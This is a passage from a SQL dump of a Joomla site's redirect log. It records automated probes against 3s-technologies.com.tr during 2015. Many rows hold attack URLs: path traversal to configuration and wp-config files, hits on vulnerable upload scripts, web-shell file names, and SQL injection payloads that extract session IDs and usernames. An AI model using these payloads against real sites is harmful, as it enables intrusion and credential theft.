05:04:13','0000-00-00 00:00:00',301),(7663,'http://3s-technologies.com.tr/index.php/en/administrator/components/com_acymailing/inc/openflash/php-ofc-library/ofc_upload_image.php','','http://3s-technologies.com.tr/index.php/en/administrator/components/com_acymailing/inc/openflash/php-ofc-library/ofc_upload_image.php','',1,0,'2015-08-10 07:57:20','0000-00-00 00:00:00',301),(7664,'http://www.3s-technologies.com.tr/index.php/en/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php','','','',3,0,'2015-08-10 09:23:28','0000-00-00 00:00:00',301),(7665,'http://3s-technologies.com.tr/index.php/en/administrator/components/com_jnewsletter/includes/openflashchart/php-ofc-library/ofc_upload_image.php','','http://3s-technologies.com.tr/index.php/en/administrator/components/com_jnewsletter/includes/openflashchart/php-ofc-library/ofc_upload_image.php','',1,0,'2015-08-10 09:28:39','0000-00-00 00:00:00',301),(7666,'http://www.ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=99&Itemid=43&lang=en','','','',1,0,'2015-08-11 05:42:48','0000-00-00 00:00:00',301),(7667,'http://3s-technologies.com.tr/index.php/en/administrator/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php','','http://3s-technologies.com.tr/index.php/en/administrator/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php','',3,0,'2015-08-12 04:20:12','0000-00-00 00:00:00',301),(7668,'http://3s-technologies.com.tr/index.php/en/administrator/components/com_jinc/classes/graphics/php-ofc-library/ofc_upload_image.php','','http://3s-technologies.com.tr/index.php/en/administrator/components/com_jinc/classes/graphics/php-ofc-library/ofc_upload_image.php','',1,0,'2015-08-12 05:53:14','0000-00-00 00:00:00',301),(7669,'http://3s-technologies.com.tr/index.php/en/administrator/components/com_maian15/charts/php-ofc-library/ofc_upload_image.php','','http://3s-technologies.com.tr/index.php/en/administrator/components/com_maian15/charts/php-ofc-library/ofc_upload_image.php','',1,0,'2015-08-12 08:09:21','0000-00-00 00:00:00',301),(7670,'http://3s-technologies.com.tr/index.php/en/dministrator/components/com_redmystic/chart/php-ofc-library/ofc_upload_image.php','','http://3s-technologies.com.tr/index.php/en/dministrator/components/com_redmystic/chart/php-ofc-library/ofc_upload_image.php','',1,0,'2015-08-12 09:37:28','0000-00-00 00:00:00',301),(7671,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/content-component/tmp/recky.php','','','',1,0,'2015-08-12 20:25:08','0000-00-00 00:00:00',301),(7672,'http://3s-technologies.com.tr/index.php/en/components/com_acymailing/inc/openflash/php-ofc-library/ofc_upload_image.php','','http://3s-technologies.com.tr/index.php/en/components/com_acymailing/inc/openflash/php-ofc-library/ofc_upload_image.php','',1,0,'2015-08-13 02:02:24','0000-00-00 00:00:00',301),(7673,'http://3s-technologies.com.tr/index.php/en/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php','','http://3s-technologies.com.tr/index.php/en/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php','',2,0,'2015-08-13 03:47:07','0000-00-00 00:00:00',301),(7674,'http://www.ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=83:neomark&catid=51:neo&Itemid=95&lang=tr','','','',1,0,'2015-08-13 11:23:02','0000-00-00 00:00:00',301),(7675,'http://www.3s-technologies.com.tr/index.php?option=com_user&view=login','','http://www.3s-technologies.com.tr/index.php?option=com_user&view=login','',2,0,'2015-08-13 17:44:51','0000-00-00 00:00:00',301),(7676,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/content-component/xmlrpc.php','','','',1,0,'2015-08-14 02:42:03','0000-00-00 00:00:00',301),(7677,'http://led-bazaar.org/3s-technologies.com.tr/joomla//index.php?option=com_myblog&task=ajaxupload','','','',1,0,'2015-08-14 05:45:22','0000-00-00 00:00:00',301),(7678,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/\"http://help.joomla.org/proxy/index.php?option=com_help&keyref=Help16:Components_Newsfeeds_Feeds\">Help</a></p></div></summary','','','',2,0,'2015-08-14 07:09:14','0000-00-00 00:00:00',301),(7679,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/\"http://help.joomla.org/proxy/index.php?option=com_help&keyref=Help16:Components_Newsfeeds_Feeds\">Help</a></p></div></content','','','',2,0,'2015-08-14 07:09:17','0000-00-00 00:00:00',301),(7680,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/\"http://help.joomla.org/proxy/index.php?option=com_help&keyref=Help16:Content_Article_Manager\">Help</a></p></div></summary','','','',1,0,'2015-08-14 07:10:03','0000-00-00 00:00:00',301),(7681,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/\"http://help.joomla.org/proxy/index.php?option=com_help&keyref=Help16:Content_Media_Manager\">Help</a></p>','','','',1,0,'2015-08-14 07:10:13','0000-00-00 00:00:00',301),(7682,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/\"http://help.joomla.org/proxy/index.php?option=com_help&keyref=Help16:Content_Article_Manager\">Help</a></p></div></content','','','',1,0,'2015-08-14 10:02:09','0000-00-00 00:00:00',301),(7683,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/\"http://help.joomla.org/proxy/index.php?option=com_help&keyref=Help16:Components_Redirect_Manager\">Help</a></p></div></content','','','',1,0,'2015-08-14 10:02:49','0000-00-00 00:00:00',301),(7684,'http://proneo-led.com/3s-technologies.com.tr/joomla//index.php?option=com_myblog&task=ajaxupload','','','',1,0,'2015-08-14 13:14:21','0000-00-00 00:00:00',301),(7685,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/\"http://help.joomla.org/proxy/index.php?option=com_help&keyref=Help16:Components_Search\">Help</a></p>','','','',1,0,'2015-08-14 14:05:40','0000-00-00 00:00:00',301),(7686,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/\"http://help.joomla.org/proxy/index.php?option=com_help&keyref=Help16:Components_Contacts_Contacts\">Help</a></p></div></summary','','','',1,0,'2015-08-14 14:05:45','0000-00-00 00:00:00',301),(7687,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/\"http://help.joomla.org/proxy/index.php?option=com_help&keyref=Help16:Components_Weblinks_Links\">Help</a></p></div></summary','','','',1,0,'2015-08-14 14:05:48','0000-00-00 00:00:00',301),(7688,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/\"http://help.joomla.org/proxy/index.php?option=com_help&keyref=Help16:Extensions_Extension_Manager_Install\">Help</a></p>','','','',1,0,'2015-08-14 14:06:09','0000-00-00 00:00:00',301),(7689,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/\"http://help.joomla.org/proxy/index.php?option=com_help&keyref=Help16:Menus_Menu_Manager\">Help</a></p>','','','',1,0,'2015-08-14 14:07:46','0000-00-00 00:00:00',301),(7690,'http://www.3s-technologies.com.tr//index.php?option=com_myblog&task=ajaxupload','','','',40,0,'2015-08-14 14:19:21','0000-00-00 00:00:00',301),(7691,'http://3s-technologies.com.tr/index.php/en/index.php?option=com_myblog&task=ajaxupload','','http://3s-technologies.com.tr/index.php/en/index.php?option=com_myblog&task=ajaxupload','',3,0,'2015-08-17 10:55:01','0000-00-00 00:00:00',301),(7692,'http://3s-technologies.com.tr/index.php/en/components/com_hdflvplayer/hdflvplayer/download.php?f=../../../configuration.php','','http://3s-technologies.com.tr/index.php/en/components/com_hdflvplayer/hdflvplayer/download.php?f=../../../configuration.php','',1,0,'2015-08-18 09:55:49','0000-00-00 00:00:00',301),(7693,'http://3s-technologies.com.tr/index.php/en/administrator/components/com_creativecontactform/creativecontactform.xml','','http://3s-technologies.com.tr/index.php/en/administrator/components/com_creativecontactform/creativecontactform.xml','',1,0,'2015-08-19 03:53:53','0000-00-00 00:00:00',301),(7694,'http://3s-technologies.com.tr/index.php/en//modules/mod_creativecontactform/mod_creativecontactform.xml','','http://3s-technologies.com.tr/index.php/en//modules/mod_creativecontactform/mod_creativecontactform.xml','',1,0,'2015-08-19 07:21:07','0000-00-00 00:00:00',301),(7695,'http://3s-technologies.com.tr/index.php/en/index.php?option=com_adsmanager&task=upload&tmpl=component','','http://3s-technologies.com.tr/index.php/en/index.php?option=com_adsmanager&task=upload&tmpl=component','',5,0,'2015-08-19 10:48:24','0000-00-00 00:00:00',301),(7696,'http://3s-technologies.com.tr/index.php/en/modules/mod_sexycontactform/mod_sexycontactform.xml','','http://3s-technologies.com.tr/index.php/en/modules/mod_sexycontactform/mod_sexycontactform.xml','',1,0,'2015-08-22 01:59:25','0000-00-00 00:00:00',301),(7697,'http://3s-technologies.com.tr/index.php?option=com_jdownloads&Itemid=0&view=upload','','','',195,0,'2015-08-22 13:02:42','0000-00-00 00:00:00',301),(7698,'http://3s-technologies.com.tr/index.php?option=com_adsmanager&task=upload&tmpl=component','','','',14,0,'2015-08-22 13:03:15','0000-00-00 00:00:00',301),(7699,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=99&Itemid=43','','','',1,0,'2015-08-26 04:44:20','0000-00-00 00:00:00',301),(7700,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=90&Itemid=102','','','',1,0,'2015-08-26 04:52:36','0000-00-00 00:00:00',301),(7701,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=93&Itemid=104','','','',1,0,'2015-08-26 04:53:10','0000-00-00 00:00:00',301),(7702,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=59&Itemid=155','','','',1,0,'2015-08-26 04:53:40','0000-00-00 00:00:00',301),(7703,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=106&Itemid=113','','','',1,0,'2015-08-26 04:55:46','0000-00-00 00:00:00',301),(7704,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&layout=blog&id=1&Itemid=28','','','',1,0,'2015-08-26 17:47:33','0000-00-00 00:00:00',301),(7705,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=80:cm101&catid=43:ultra-hizli&Itemid=87','','','',1,0,'2015-08-26 17:47:34','0000-00-00 00:00:00',301),(7706,'http://www.ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=85:neocut&catid=51:neo&Itemid=97&lang=tr','','','',1,0,'2015-08-27 06:50:57','0000-00-00 00:00:00',301),(7707,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/index.php/en/using-joomla/extensions/plugins','','http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/plugins','',1,0,'2015-08-30 01:59:24','0000-00-00 00:00:00',301),(7708,'http://www.3s-technologies.com.tr/index.php/en/products/manufacturer/mirae/smd-ultra-h','','','',1,0,'2015-08-30 20:23:01','0000-00-00 00:00:00',301),(7709,'http://www.3s-technologies.com.tr/index.php?option=com_myblog&task=ajaxupload','','','',40,0,'2015-09-04 08:25:51','0000-00-00 00:00:00',301),(7710,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/components/com_hdflvplayer/hdflvplayer/download.php?f=../../../configuration.php','','','',1,0,'2015-09-04 08:25:54','0000-00-00 00:00:00',301),(7711,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=mil.php','','','',1,0,'2015-09-04 08:26:00','0000-00-00 00:00:00',301),(7712,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/administrator/components/com_jnewsletter/includes/openflashchart/php-ofc-library/ofc_upload_image.php','','','',1,0,'2015-09-04 08:26:01','0000-00-00 00:00:00',301),(7713,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/administrator/components/com_acymailing/inc/openflash/php-ofc-library/ofc_upload_image.php?name=mil.php','','','',1,0,'2015-09-04 08:26:02','0000-00-00 00:00:00',301),(7714,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/administrator/components/com_civicrm/civicrm/packages/OpenFlashChart/php-ofc-library/ofc_upload_image.php','','','',1,0,'2015-09-04 08:26:03','0000-00-00 00:00:00',301),(7715,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/administrator/components/com_jinc/classes/graphics/php-ofc-library/ofc_upload_image.php','','','',1,0,'2015-09-04 08:26:05','0000-00-00 00:00:00',301),(7716,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/administrator/components/com_maianmedia/utilities/charts/php-ofc-library/ofc_upload_image.php','','','',1,0,'2015-09-04 08:26:07','0000-00-00 00:00:00',301),(7717,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/administrator/components/com_maian15/charts/php-ofc-library/ofc_upload_image.php','','','',1,0,'2015-09-04 08:26:09','0000-00-00 00:00:00',301),(7718,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/administrator/components/com_redmystic/chart/ofc-library/ofc_upload_image.php','','','',1,0,'2015-09-04 08:26:11','0000-00-00 00:00:00',301),(7719,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/administrator/components/com_joomleague/assets/classes/open-flash-chart/ofc_upload_image.php','','','',1,0,'2015-09-04 08:26:13','0000-00-00 00:00:00',301),(7720,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/administrator/components/com_bt_portfolio/helpers/uploadify/uploadify.php','','','',1,0,'2015-09-04 08:26:16','0000-00-00 00:00:00',301),(7721,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/index.php?option=com_jdownloads&Itemid=0&view=upload','','','',1,0,'2015-09-04 08:26:19','0000-00-00 00:00:00',301),(7722,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/javascript\" src=\"http://www.omas.gen.tr/jquery.mb.menu.2.8.5/inc/upload.php','','','',1,0,'2015-09-04 08:26:28','0000-00-00 00:00:00',301),(7723,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/components/com_sexycontactform/fileupload/index.php','','','',1,0,'2015-09-04 08:26:31','0000-00-00 00:00:00',301),(7724,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/components/com_creativecontactform/fileupload/index.php','','','',1,0,'2015-09-04 08:26:33','0000-00-00 00:00:00',301),(7725,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/index.php?option=com_adsmanager&task=upload&tmpl=component','','','',1,0,'2015-09-04 08:26:34','0000-00-00 00:00:00',301),(7726,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components//components/com_hwdvideoshare/assets/uploads/flash/jqUploader.swf','','','',1,0,'2015-09-04 08:26:37','0000-00-00 00:00:00',301),(7727,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/index.php?option=com_myblog&task=ajaxupload','','','',1,0,'2015-09-04 08:26:38','0000-00-00 00:00:00',301),(7728,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/content-component/images/stories/petx.php?baca','','','',2,0,'2015-09-10 13:29:48','0000-00-00 00:00:00',301),(7729,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/content-component/images/stories/explore.php?baca','','','',2,0,'2015-09-10 13:29:51','0000-00-00 00:00:00',301),(7730,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/content-component/images/stories/magic.php.png','','','',2,0,'2015-09-10 13:30:12','0000-00-00 00:00:00',301),(7731,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/content-component/images/stories/magic.php.png?baca','','','',2,0,'2015-09-10 13:30:13','0000-00-00 00:00:00',301),(7732,'http://3s-technologies.com.tr/index.php?option=com_myblog&task=ajaxupload','','','',11,0,'2015-09-25 12:10:09','0000-00-00 00:00:00',301),(7733,'http://3s-technologies.com.tr//index.php?option=com_adsmanager&task=upload&tmpl=component','','','',36,0,'2015-10-01 20:43:14','0000-00-00 00:00:00',301),(7734,'http://3s-technologies.com.tr/index.php/en/modules/mod_hdflvplayer/mod_hdflvplayer.xml','','http://3s-technologies.com.tr/index.php/en/modules/mod_hdflvplayer/mod_hdflvplayer.xml','',1,0,'2015-10-09 10:32:43','0000-00-00 00:00:00',301),(7735,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions/templates/beez-2/home-page-beez-2/images/stories/petx.php?baca','','','',1,0,'2015-10-11 01:41:20','0000-00-00 00:00:00',301),(7736,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions/templates/beez-2/home-page-beez-2/images/stories/explore.php?baca','','','',1,0,'2015-10-11 01:41:31','0000-00-00 00:00:00',301),(7737,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions/templates/beez-2/home-page-beez-2/images/stories/magic.php.png','','','',1,0,'2015-10-11 01:41:52','0000-00-00 00:00:00',301),(7738,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions/templates/beez-2/home-page-beez-2/images/stories/magic.php.png?baca','','','',1,0,'2015-10-11 01:41:53','0000-00-00 00:00:00',301),(7739,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/en/products/manufacturer/panasonic/smd-orta-hızlı/dirDesc','','','',1,0,'2015-10-17 00:57:18','0000-00-00 00:00:00',301),(7740,'http://3s-technologies.com.tr/index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1','','','',5,0,'2015-10-24 10:12:09','0000-00-00 00:00:00',301),(7741,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/ueruenl','','','',1,0,'2015-10-25 01:08:20','0000-00-00 00:00:00',301),(7742,'http://www.3s-technologies.com.tr/index.php/en/?option=com_contenthistory&view=history&list[ordering]=&item_id=75&type_id=1&list[select]=(select 1FROM(select count(*),concat((select(select concat(session_id))From jml_session LIMIT 0,1)floor(rand(0)*2))x F','','','',1,0,'2015-10-26 11:21:29','0000-00-00 00:00:00',301),(7743,'http://3s-technologies.com.tr/?list[select]=polygon((/*!00000select*/*/*!00000from*/(/*!00000select*/*/*!00000from*/(/*!00000select*/concat_ws(0x7e3a,0x6d616b6d616e,version(),user())as+mk)``)``))&option=com_contenthistory&type_id=&item_id=&list[ordering]=','','','',1,0,'2015-10-27 10:33:52','0000-00-00 00:00:00',301),(7744,'http://www.3s-technologies.com.tr/index.php/en/products/smd-ultra-h','','','',1,0,'2015-10-27 12:53:37','0000-00-00 00:00:00',301),(7745,'http://3s-technologies.com.tr/index.php?option=com_contenthistory&view=history&list[select]=1','','','',1,0,'2015-10-27 23:08:22','0000-00-00 00:00:00',301),(7746,'http://3s-technologies.com.tr/index.php/en/?option=com_contenthistory&view=history&item_id=1&type_id=1&list[ordering]&list[select]=(select 1 from (select count(*),concat((select username from ','','','',2,0,'2015-10-28 20:16:39','0000-00-00 00:00:00',301),(7747,'http://www.3s-technologies.com.tr/index.php?option=com_contenthistory&view=history&list[ordering]=&item_id=1&type_id=1&list[select]=(select 1 from (select count(*),concat((select 0x6176666973686572),floor(rand(0)*2))x from information_schema.tables group ','','','',1,0,'2015-10-29 03:04:44','0000-00-00 00:00:00',301),(7748,'http://3s-technologies.com.tr/index.php','','http://3s-technologies.com.tr/','',596,0,'2015-10-30 17:21:21','0000-00-00 00:00:00',301),(7749,'http://www.3s-technologies.com.tr/index.php?list[select]=+(select+1+FROM(select+count(*),concat((select+(select+concat(session_id))+FROM+k78asdfgdsmo_session+WHERE+data+LIKE+\'%Super+User%\'+AND+data+NOT+LIKE+\'%IS+NOT+NULL%\'+AND+userid!=\'0\'+AND+username+IS+','','','',1,0,'2015-11-01 22:00:58','0000-00-00 00:00:00',301),(7750,'http://www.3s-technologies.com.tr//index.php/tr//','','','',3,0,'2015-11-02 06:23:40','0000-00-00 00:00:00',301),(7751,'http://www.3s-technologies.com.tr//index.php/en//','','','',3,0,'2015-11-02 06:23:47','0000-00-00 00:00:00',301),(7752,'http://www.3s-technologies.com.tr//index.php/tr/ueruenler//','','','',3,0,'2015-11-02 06:25:08','0000-00-00 00:00:00',301),(7753,'http://www.3s-technologies.com.tr//index.php/tr/ueruenler/manufacturers//','','','',3,0,'2015-11-02 06:31:03','0000-00-00 00:00:00',301),(7754,'http://www.3s-technologies.com.tr//index.php/tr/anasayfa2/80-turkish-tr/turkish-content//','','','',3,0,'2015-11-02 06:31:18','0000-00-00 00:00:00',301),(7755,'http://www.3s-technologies.com.tr//index.php/en/products//','','','',3,0,'2015-11-02 06:31:26','0000-00-00 00:00:00',301),(7756,'http://3s-technologies.com.tr/index.php?option=com_contenthistory&view=history&list[ordering]=&item_id=75&type_id=1&list[select]=(ExtractValue(1,(select concat(0x3a676f6f643a))))','','','',1,0,'2015-11-05 15:17:46','0000-00-00 00:00:00',301),(7757,'http://www.3s-technologies.com.tr/index.php/tr/uerue','','','',9,0,'2015-11-17 11:47:46','0000-00-00 00:00:00',301),(7758,'http://www.3s-technologies.com.tr/index.php?option=com_firmy','','','',1,0,'2015-11-22 15:24:51','0000-00-00 00:00:00',301),(7759,'http://www.3s-technologies.com.tr/index.php?option=com_x-shop','','','',1,0,'2015-11-22 15:24:53','0000-00-00 00:00:00',301),(7760,'http://www.3s-technologies.com.tr/index.php?option=com_tag','','','',1,0,'2015-11-22 15:24:53','0000-00-00 00:00:00',301),(7761,'http://www.3s-technologies.com.tr/index.php/en/?option=com_easyblog&view=dashboard&layout=write','','http://www.3s-technologies.com.tr/','',64,0,'2015-11-24 12:11:06','0000-00-00 00:00:00',301),(7762,'http://3s-technologies.com.tr/index.php?option=com_kunena&func=userlist&search=%\'+and+1=2)+union+select+1,concat(0x7e,table_name,0x7e),2,3,4,5,6,7,8,9,10,11,12,13,14,15+from+information_schema.tables+where+table_name=0x4348415241435445525f53455453 -- ;','','http://3s-technologies.com.tr/index.php?option=com_kunena&func=userlist&search=%25\'+and+1=2)+union+select+1,concat(0x7e,table_name,0x7e),2,3,4,5,6,7,8','',1,0,'2015-12-01 14:46:48','0000-00-00 00:00:00',301),(7763,'http://3s-technologies.com.tr/index.php?option=com_ignitegallery&task=view&gallery=-8+union+select+1,2,concat(0x7e,table_name,0x7e),4,5,6,7,8,9,10+from+information_schema.tables+where+table_name=0x4348415241435445525f53455453--&Itemid=6','','http://3s-technologies.com.tr/index.php?option=com_ignitegallery&task=view&gallery=-8+union+select+1,2,concat(0x7e,table_name,0x7e),4,5,6,7,8,9,10+fro','',1,0,'2015-12-01 17:39:16','0000-00-00 00:00:00',301),(7764,'http://3s-technologies.com.tr/index.php?view=videos&type=member&user_id=-62+union+select+1,2,concat(0x7e,table_name,0x7e),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+information_schema.tables+where+table_name=0x43484152414354455','','http://3s-technologies.com.tr/index.php?view=videos&type=member&user_id=-62+union+select+1,2,concat(0x7e,table_name,0x7e),4,5,6,7,8,9,10,11,12,13,14,1','',1,0,'2015-12-02 13:31:46','0000-00-00 00:00:00',301),(7765,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/content-component/article-categories&amp;sa=U&amp;ved=0ahUKEwi8j-yxgb3JAhVKz3IKHaNADx0QFgi2AjBD&amp;usg=AFQjCNFpnGoh0kq_Sd9AxId8eyuCnzJb5A/components/com_hdflvplayer/hdflvpl','','','',1,0,'2015-12-02 13:39:31','0000-00-00 00:00:00',301),(7766,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/content-component/article-categories&amp;sa=U&amp;ved=0ahUKEwi8j-yxgb3JAhVKz3IKHaNADx0QFgi2AjBD&amp;usg=AFQjCNFpnGoh0kq_Sd9AxId8eyuCnzJb5A/components/com_jnews/includes/open','','','',1,0,'2015-12-02 13:39:35','0000-00-00 00:00:00',301),(7767,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/content-component/article-categories&amp;sa=U&amp;ved=0ahUKEwi8j-yxgb3JAhVKz3IKHaNADx0QFgi2AjBD&amp;usg=AFQjCNFpnGoh0kq_Sd9AxId8eyuCnzJb5A/administrator/components/com_acyma','','','',1,0,'2015-12-02 13:39:38','0000-00-00 00:00:00',301),(7768,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/content-component/article-categories&amp;sa=U&amp;ved=0ahUKEwi8j-yxgb3JAhVKz3IKHaNADx0QFgi2AjBD&amp;usg=AFQjCNFpnGoh0kq_Sd9AxId8eyuCnzJb5A/administrator/components/com_jnews','','','',1,0,'2015-12-02 13:39:39','0000-00-00 00:00:00',301),(7769,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/content-component/article-categories&amp;sa=U&amp;ved=0ahUKEwi8j-yxgb3JAhVKz3IKHaNADx0QFgi2AjBD&amp;usg=AFQjCNFpnGoh0kq_Sd9AxId8eyuCnzJb5A/administrator/components/com_civic','','','',1,0,'2015-12-02 13:39:41','0000-00-00 00:00:00',301),(7770,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/content-component/article-categories&amp;sa=U&amp;ved=0ahUKEwi8j-yxgb3JAhVKz3IKHaNADx0QFgi2AjBD&amp;usg=AFQjCNFpnGoh0kq_Sd9AxId8eyuCnzJb5A/administrator/components/com_jinc/','','','',1,0,'2015-12-02 13:39:43','0000-00-00 00:00:00',301),(7771,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/content-component/article-categories&amp;sa=U&amp;ved=0ahUKEwi8j-yxgb3JAhVKz3IKHaNADx0QFgi2AjBD&amp;usg=AFQjCNFpnGoh0kq_Sd9AxId8eyuCnzJb5A/administrator/components/com_maian','','','',1,0,'2015-12-02 13:39:46','0000-00-00 00:00:00',301),(7772,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/content-component/article-categories&amp;sa=U&amp;ved=0ahUKEwi8j-yxgb3JAhVKz3IKHaNADx0QFgi2AjBD&amp;usg=AFQjCNFpnGoh0kq_Sd9AxId8eyuCnzJb5A/administrator/components/com_redmy','','','',1,0,'2015-12-02 13:39:49','0000-00-00 00:00:00',301),(7773,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/content-component/article-categories&amp;sa=U&amp;ved=0ahUKEwi8j-yxgb3JAhVKz3IKHaNADx0QFgi2AjBD&amp;usg=AFQjCNFpnGoh0kq_Sd9AxId8eyuCnzJb5A/administrator/components/com_jooml','','','',1,0,'2015-12-02 13:39:51','0000-00-00 00:00:00',301),(7774,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/content-component/article-categories&amp;sa=U&amp;ved=0ahUKEwi8j-yxgb3JAhVKz3IKHaNADx0QFgi2AjBD&amp;usg=AFQjCNFpnGoh0kq_Sd9AxId8eyuCnzJb5A/administrator/components/com_bt_po','','','',1,0,'2015-12-02 13:39:53','0000-00-00 00:00:00',301),(7775,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/content-component/article-categories&amp;sa=U&amp;ved=0ahUKEwi8j-yxgb3JAhVKz3IKHaNADx0QFgi2AjBD&amp;usg=AFQjCNFpnGoh0kq_Sd9AxId8eyuCnzJb5A/index.php?option=com_jdownloads&It','','','',1,0,'2015-12-02 13:39:55','0000-00-00 00:00:00',301),(7776,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/content-component/article-categories&amp;sa=U&amp;ved=0ahUKEwi8j-yxgb3JAhVKz3IKHaNADx0QFgi2AjBD&amp;usg=AFQjCNFpnGoh0kq_Sd9AxId8eyuCnzJb5A/','','','',1,0,'2015-12-02 13:39:57','0000-00-00 00:00:00',301),(7777,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/content-component/article-categories&amp;sa=U&amp;ved=0ahUKEwi8j-yxgb3JAhVKz3IKHaNADx0QFgi2AjBD&amp;usg=AFQjCNFpnGoh0kq_Sd9AxId8eyuCnzJb5A//inc/upload.php','','','',1,0,'2015-12-02 13:40:05','0000-00-00 00:00:00',301),(7778,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/content-component/article-categories&amp;sa=U&amp;ved=0ahUKEwi8j-yxgb3JAhVKz3IKHaNADx0QFgi2AjBD&amp;usg=AFQjCNFpnGoh0kq_Sd9AxId8eyuCnzJb5A/components/com_sexycontactform/fil','','','',1,0,'2015-12-02 13:40:09','0000-00-00 00:00:00',301),(7779,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/content-component/article-categories&amp;sa=U&amp;ved=0ahUKEwi8j-yxgb3JAhVKz3IKHaNADx0QFgi2AjBD&amp;usg=AFQjCNFpnGoh0kq_Sd9AxId8eyuCnzJb5A/components/com_creativecontactform','','','',1,0,'2015-12-02 13:40:12','0000-00-00 00:00:00',301),(7780,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/content-component/article-categories&amp;sa=U&amp;ved=0ahUKEwi8j-yxgb3JAhVKz3IKHaNADx0QFgi2AjBD&amp;usg=AFQjCNFpnGoh0kq_Sd9AxId8eyuCnzJb5A/index.php?option=com_adsmanager&ta','','','',1,0,'2015-12-02 13:40:15','0000-00-00 00:00:00',301),(7781,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/content-component/components/com_hdflvplayer/hdflvplayer/download.php?f=../../../configuration.php','','','',2,0,'2015-12-02 13:41:07','0000-00-00 00:00:00',301),(7782,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/content-component/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=mil.php','','','',1,0,'2015-12-02 13:41:11','0000-00-00 